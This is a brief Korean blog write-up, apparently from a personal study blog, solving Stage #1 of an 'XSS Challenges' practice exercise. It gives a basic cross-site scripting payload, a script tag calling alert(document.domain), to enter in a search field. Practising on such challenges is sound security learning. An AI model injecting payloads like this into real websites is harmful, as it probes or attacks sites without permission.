Web Hacking/xss

[XSS Challenges] Stage #1

ankisile 2020. 8. 17. 01:43

문제

 

풀이

search에 <script>alert(document.domain);</script>를 넣으면 풀린다.